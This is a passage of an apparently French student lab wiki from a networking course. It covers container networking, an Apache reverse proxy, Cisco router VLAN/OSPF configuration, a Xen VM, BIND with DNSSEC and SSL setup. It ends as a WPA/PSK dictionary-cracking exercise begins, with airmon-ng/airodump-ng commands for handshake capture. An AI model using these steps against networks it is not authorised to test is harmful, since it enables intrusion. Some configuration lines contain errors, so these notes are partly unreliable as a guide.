&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
 xl create Dionysos.cfg&lt;br /&gt;
 xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/ssh/sshd_config nous décommentons la ligne : &lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Ainsi nous pouvons nous connecter en ssh sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
 ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
 xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.space &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
